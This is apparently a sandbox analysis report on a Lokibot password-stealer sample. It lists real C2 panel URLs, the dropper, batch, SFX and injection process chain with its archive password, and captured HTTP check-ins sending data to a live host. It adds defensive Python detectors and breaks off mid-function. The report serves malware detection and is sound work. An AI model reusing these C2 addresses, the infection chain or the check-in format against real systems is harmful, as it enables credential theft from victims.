Analysis

  • max time kernel
    141s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    09-12-2024 02:10

General

  • Target

    3439eaffe1dfd634b46a29ee7f0e938b5b05f9c784123a70b94f9f46aa370381.exe

  • Size

    733KB

  • MD5

    c27bf6db51f64901ba56cf64003cabd2

  • SHA1

    005e61ccfa9a0840d788bcff2a95cff7ec88d6db

  • SHA256

    3439eaffe1dfd634b46a29ee7f0e938b5b05f9c784123a70b94f9f46aa370381

  • SHA512

    1b3b19272c1d0ae7be07b4be04fbcc58e46b9fedeb31a4292bd3e8a270a2deee22efdd9891a26e708ac5d987b6996cefdac64665a685f52cbfcd54e66eb1d443

  • SSDEEP

    12288:WcrNS33L10QdrX2mVnCGoe0cZKqMEF0JCEharfH0uceMTLlW44UdLZeZ:FNA3R5drXbVCGoRcZDMEwC9UucrjLc

Malware Config

Extracted

Family

lokibot

C2

https://www.stipamana.com/dftjedrshyyj/Panel/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Only the first URL was contacted during this run, and over plain HTTP on port 80 rather than the https scheme in the extracted config (see Network below). The other four (kbfvzoboss.bid and the alphastand.* domains) are the placeholder panel URLs hard-coded into the widely circulated cracked Lokibot builder and turn up in most Lokibot configs; treat them as a family fingerprint, not as this operator's infrastructure.

Signatures

  • Lokibot

    Lokibot is a password and cryptocurrency-wallet stealer.

  • Lokibot family
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Executes dropped EXE 5 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 15 IoCs

    Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3439eaffe1dfd634b46a29ee7f0e938b5b05f9c784123a70b94f9f46aa370381.exe
    "C:\Users\Admin\AppData\Local\Temp\3439eaffe1dfd634b46a29ee7f0e938b5b05f9c784123a70b94f9f46aa370381.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1320
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\sfgdf.bat" "
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3848
      • C:\Users\Admin\AppData\Roaming\segzs.sfx.exe
        segzs.sfx.exe -pgeyhrntdeszopthnymkdetyuhngfszafupbodcsyRhvqxsdfHbgnmeL -dC:\Users\Admin\AppData\Roaming
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4552
        • C:\Users\Admin\AppData\Roaming\segzs.exe
          "C:\Users\Admin\AppData\Roaming\segzs.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:5104
          • C:\Users\Admin\AppData\Roaming\segzs.exe
            C:\Users\Admin\AppData\Roaming\segzs.exe
            5⤵
            • Executes dropped EXE
            • Accesses Microsoft Outlook profiles
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            • outlook_office_path
            • outlook_win_path
            PID:3024
          • C:\Users\Admin\AppData\Roaming\segzs.exe
            C:\Users\Admin\AppData\Roaming\segzs.exe
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:3984
          • C:\Users\Admin\AppData\Roaming\segzs.exe
            C:\Users\Admin\AppData\Roaming\segzs.exe
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:4132
    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\mts103swift.pdf"
      2⤵
      • System Location Discovery: System Language Discovery
      • Checks processor information in registry
      • Modifies Internet Explorer settings
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:836
      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1852
        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F2DABF2F9771C9F79E2E1779CBC283EB --mojo-platform-channel-handle=1772 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4432
        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=2D6E0ABBBA48D6619C60411136957E31 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=2D6E0ABBBA48D6619C60411136957E31 --renderer-client-id=2 --mojo-platform-channel-handle=1792 --allow-no-sandbox-job /prefetch:1
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3384
        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=3F095C7917672CB9017E7233E55D736C --mojo-platform-channel-handle=2344 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1068
        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=0ED2A05758D7937368FBDBBDB827BAAB --mojo-platform-channel-handle=1956 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
          4⤵
          • System Location Discovery: System Language Discovery
          PID:756
        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=D693F4AF69D6E159693028C372B50A4C --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=D693F4AF69D6E159693028C372B50A4C --renderer-client-id=6 --mojo-platform-channel-handle=2364 --allow-no-sandbox-job /prefetch:1
          4⤵
          • System Location Discovery: System Language Discovery
          PID:508
        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=EEDD69F4440B00572181E8882399985A --mojo-platform-channel-handle=2564 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
          4⤵
          • System Location Discovery: System Language Discovery
          PID:5088
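
The process tree above shows the whole chain in command lines alone: the dropper writes a batch file to %AppData%, cmd.exe runs it, the batch launches a WinRAR-style self-extractor with the archive password (-p...) and the extraction directory (-d...) on the command line, the extracted segzs.exe starts three copies of itself (the SetThreadContext and WriteProcessMemory signatures on PID 5104 are the injection into those children), and a decoy PDF is opened in Acrobat Reader so the victim sees a document. The Python below is an added example, not code from the sandbox or from the sample: it replays constructed process-creation events mirroring the tree (the pid/ppid/image/cmdline field names are an assumed generic schema, not any vendor's format; PIDs and command lines are as reported, with the RdrCEF command lines shortened to their first switch), flags each link of the chain, and pulls the SFX password and destination out of the command line so the archive can be opened offline for static analysis instead of being run.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record. The field names are an assumed, generic
    schema for this example, not the layout of any particular EDR or Sysmon."""
    pid: int
    ppid: int
    image: str     # full path of the started executable
    cmdline: str   # command line exactly as logged


# Directory fragments an unprivileged user can write to. Matched case-insensitively.
USER_WRITABLE = ("\\appdata\\local\\", "\\appdata\\roaming\\",
                 "c:\\users\\public\\", "c:\\programdata\\")

# WinRAR SFX switches: the password (-p<pwd>) and extraction directory (-d<path>)
# are glued to the switch letter, which is why they are readable in the command line.
SFX_PASSWORD = re.compile(r"(?:^|\s)-p(\S+)")
SFX_DEST = re.compile(r'(?:^|\s)-d("[^"]+"|\S+)')
# cmd.exe /c "<path>.bat" with any amount of (possibly doubled) quoting.
BATCH_FROM_CMD = re.compile(r'cmd\.exe\s+/c\s+"*([^"]+\.bat)"*', re.IGNORECASE)


def is_user_writable(path: str) -> bool:
    p = path.lower().rstrip("\\") + "\\"
    return any(frag in p for frag in USER_WRITABLE)


def parse_sfx_switches(cmdline: str) -> dict:
    """Return the -p password and -d directory of an SFX command line (None if absent)."""
    pw = SFX_PASSWORD.search(cmdline)
    dest = SFX_DEST.search(cmdline)
    return {"password": pw.group(1) if pw else None,
            "dest": dest.group(1).strip('"') if dest else None}


def find_chain(events) -> dict:
    """Flag each link of the chain. Returns {pid: [reason, ...]} for flagged processes."""
    by_pid = {e.pid: e for e in events}
    findings = {}

    def flag(pid, reason):
        findings.setdefault(pid, []).append(reason)

    for e in events:
        img = e.image.lower()
        parent = by_pid.get(e.ppid)
        # 1. cmd.exe running a batch file that was staged in a user-writable directory
        m = BATCH_FROM_CMD.search(e.cmdline)
        if img.endswith("\\cmd.exe") and m and is_user_writable(m.group(1)):
            flag(e.pid, "cmd.exe runs staged batch file " + m.group(1))
        # 2. a password-protected self-extractor unpacking into a user-writable directory
        sw = parse_sfx_switches(e.cmdline)
        if img.endswith(".sfx.exe") and sw["password"] and sw["dest"] and is_user_writable(sw["dest"]):
            flag(e.pid, "password-protected SFX extracts to " + sw["dest"])
        # 3. a user-writable executable starting an identical copy of itself: the shape
        #    left behind when a suspended child is hollowed and resumed via SetThreadContext.
        if parent is not None and parent.image.lower() == img and is_user_writable(e.image):
            flag(e.pid, "identical child of " + str(e.ppid) + " (injection candidate)")
    return findings


# Constructed events mirroring the report's process tree (ppid 0 = parent not in the tree).
_RDR = "C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AcroCEF\\RdrCEF.exe"
_DROPPER = "C:\\Users\\Admin\\AppData\\Local\\Temp\\3439eaffe1dfd634b46a29ee7f0e938b5b05f9c784123a70b94f9f46aa370381.exe"
_SEGZS = "C:\\Users\\Admin\\AppData\\Roaming\\segzs.exe"
SAMPLE_EVENTS = [
    ProcEvent(1320, 0, _DROPPER, '"' + _DROPPER + '"'),
    ProcEvent(3848, 1320, "C:\\Windows\\SysWOW64\\cmd.exe",
              'C:\\Windows\\system32\\cmd.exe /c ""C:\\Users\\Admin\\AppData\\Roaming\\sfgdf.bat" "'),
    ProcEvent(4552, 3848, "C:\\Users\\Admin\\AppData\\Roaming\\segzs.sfx.exe",
              "segzs.sfx.exe -pgeyhrntdeszopthnymkdetyuhngfszafupbodcsyRhvqxsdfHbgnmeL -dC:\\Users\\Admin\\AppData\\Roaming"),
    ProcEvent(5104, 4552, _SEGZS, '"' + _SEGZS + '"'),
    ProcEvent(3024, 5104, _SEGZS, _SEGZS),
    ProcEvent(3984, 5104, _SEGZS, _SEGZS),
    ProcEvent(4132, 5104, _SEGZS, _SEGZS),
    ProcEvent(836, 1320, "C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AcroRd32.exe",
              '"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AcroRd32.exe" "C:\\Users\\Admin\\AppData\\Roaming\\mts103swift.pdf"'),
    ProcEvent(1852, 836, _RDR, '"' + _RDR + '" --backgroundcolor=16514043'),
    ProcEvent(4432, 1852, _RDR, '"' + _RDR + '" --type=gpu-process'),
]

if __name__ == "__main__":
    for pid, reasons in sorted(find_chain(SAMPLE_EVENTS).items()):
        for reason in reasons:
            print(pid, reason)
```

The self-spawn check is deliberately limited to images in user-writable paths: RdrCEF.exe also starts identical children (Chromium's gpu and renderer processes), and without the path filter the rule would fire on every PDF opened. With the recovered password an analyst can list and extract segzs.sfx.exe with an archiver that reads RAR SFX stubs (for example 7-Zip with -p<password>) and hand the inner segzs.exe to static tooling without ever executing the chain.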

Network

  • flag-us
    DNS
    209.205.72.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    209.205.72.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    20.49.80.91.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    20.49.80.91.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    76.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    76.32.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    www.stipamana.com
    segzs.exe
    Remote address:
    8.8.8.8:53
    Request
    www.stipamana.com
    IN A
    Response
    www.stipamana.com
    IN A
    87.121.86.205
  • flag-bg
    POST
    http://www.stipamana.com/dftjedrshyyj/Panel/five/fre.php
    segzs.exe
    Remote address:
    87.121.86.205:80
    Request
    POST /dftjedrshyyj/Panel/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: www.stipamana.com
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 78FD62C
    Content-Length: 358
    Connection: close
    Response
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Mon, 09 Dec 2024 02:10:25 GMT
    Content-Type: text/html; charset=iso-8859-1
    Content-Length: 229
    Connection: close
  • flag-bg
    POST
    http://www.stipamana.com/dftjedrshyyj/Panel/five/fre.php
    segzs.exe
    Remote address:
    87.121.86.205:80
    Request
    POST /dftjedrshyyj/Panel/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: www.stipamana.com
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 78FD62C
    Content-Length: 180
    Connection: close
    Response
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Mon, 09 Dec 2024 02:10:25 GMT
    Content-Type: text/html; charset=iso-8859-1
    Content-Length: 229
    Connection: close
  • flag-bg
    POST
    http://www.stipamana.com/dftjedrshyyj/Panel/five/fre.php
    segzs.exe
    Remote address:
    87.121.86.205:80
    Request
    POST /dftjedrshyyj/Panel/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: www.stipamana.com
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 78FD62C
    Content-Length: 153
    Connection: close
    Response
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Mon, 09 Dec 2024 02:10:26 GMT
    Content-Type: text/html; charset=iso-8859-1
    Content-Length: 229
    Connection: close
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    205.86.121.87.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    205.86.121.87.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    177.192.25.184.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    177.192.25.184.in-addr.arpa
    IN PTR
    Response
    177.192.25.184.in-addr.arpa
    IN PTR
    a184-25-192-177.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    58.55.71.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    58.55.71.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    59.139.73.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    59.139.73.23.in-addr.arpa
    IN PTR
    Response
    59.139.73.23.in-addr.arpa
    IN PTR
    a23-73-139-59.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    197.87.175.4.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    197.87.175.4.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    15.164.165.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    15.164.165.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    21.49.80.91.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    21.49.80.91.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    133.130.81.91.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    133.130.81.91.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    43.229.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    43.229.111.52.in-addr.arpa
    IN PTR
    Response
  • 87.121.86.205:80
    http://www.stipamana.com/dftjedrshyyj/Panel/five/fre.php
    http
    segzs.exe
    888 B
    644 B
    6
    6

    HTTP Request

    POST http://www.stipamana.com/dftjedrshyyj/Panel/five/fre.php

    HTTP Response

    404
  • 87.121.86.205:80
    http://www.stipamana.com/dftjedrshyyj/Panel/five/fre.php
    http
    segzs.exe
    710 B
    644 B
    6
    6

    HTTP Request

    POST http://www.stipamana.com/dftjedrshyyj/Panel/five/fre.php

    HTTP Response

    404
  • 87.121.86.205:80
    http://www.stipamana.com/dftjedrshyyj/Panel/five/fre.php
    http
    segzs.exe
    683 B
    644 B
    6
    6

    HTTP Request

    POST http://www.stipamana.com/dftjedrshyyj/Panel/five/fre.php

    HTTP Response

    404
  • 8.8.8.8:53
    209.205.72.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    209.205.72.20.in-addr.arpa

  • 8.8.8.8:53
    20.49.80.91.in-addr.arpa
    dns
    70 B
    145 B
    1
    1

    DNS Request

    20.49.80.91.in-addr.arpa

  • 8.8.8.8:53
    76.32.126.40.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    76.32.126.40.in-addr.arpa

  • 8.8.8.8:53
    www.stipamana.com
    dns
    segzs.exe
    63 B
    79 B
    1
    1

    DNS Request

    www.stipamana.com

    DNS Response

    87.121.86.205

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    205.86.121.87.in-addr.arpa
    dns
    72 B
    132 B
    1
    1

    DNS Request

    205.86.121.87.in-addr.arpa

  • 8.8.8.8:53
    177.192.25.184.in-addr.arpa
    dns
    73 B
    139 B
    1
    1

    DNS Request

    177.192.25.184.in-addr.arpa

  • 8.8.8.8:53
    58.55.71.13.in-addr.arpa
    dns
    70 B
    144 B
    1
    1

    DNS Request

    58.55.71.13.in-addr.arpa

  • 8.8.8.8:53
    59.139.73.23.in-addr.arpa
    dns
    71 B
    135 B
    1
    1

    DNS Request

    59.139.73.23.in-addr.arpa

  • 8.8.8.8:53
    197.87.175.4.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    197.87.175.4.in-addr.arpa

  • 8.8.8.8:53
    15.164.165.52.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    15.164.165.52.in-addr.arpa

  • 8.8.8.8:53
    21.49.80.91.in-addr.arpa
    dns
    70 B
    145 B
    1
    1

    DNS Request

    21.49.80.91.in-addr.arpa

  • 8.8.8.8:53
    133.130.81.91.in-addr.arpa
    dns
    72 B
    147 B
    1
    1

    DNS Request

    133.130.81.91.in-addr.arpa

  • 8.8.8.8:53
    43.229.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    43.229.111.52.in-addr.arpa
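
Three things in the traffic above are worth keying on. The first C2 URL in the extracted config is https, but the implant spoke plain HTTP/1.0 to port 80. Every check-in carries the long-standing Lokibot User-Agent `Mozilla/4.08 (Charon; Inferno)` and the non-standard `Content-Key` header. And the server answered 404 each time, which says nothing about whether the 358-, 180- and 153-byte request bodies were read by anything, so detection has to sit on the request rather than the response. The Python below is an added example, not part of the report or of any vendor's signature set: it parses a raw HTTP request and scores it against those request-side indicators. The sample request is constructed from the captured headers with filler bytes in place of the body, which the page does not contain.

```python
import re

# User-Agent string of the Lokibot check-in captured in this report.
LOKIBOT_UA = "Mozilla/4.08 (Charon; Inferno)"


def parse_request(raw: bytes) -> dict:
    """Split a raw HTTP/1.x request into request line, lower-cased headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}


def lokibot_indicators(req: dict) -> list:
    """Return the request-side indicators that matched (empty list: nothing matched)."""
    h = req["headers"]
    hits = []
    if h.get("user-agent") == LOKIBOT_UA:
        hits.append("User-Agent 'Charon; Inferno'")
    if "content-key" in h and re.fullmatch(r"[0-9A-Fa-f]{1,8}", h["content-key"]):
        hits.append("non-standard Content-Key header")
    if req["method"] == "POST" and req["target"].lower().endswith("/fre.php"):
        hits.append("POST to a fre.php panel gate")
    if (req["version"] == "HTTP/1.0" and h.get("content-type") == "application/octet-stream"
            and h.get("content-encoding") == "binary"):
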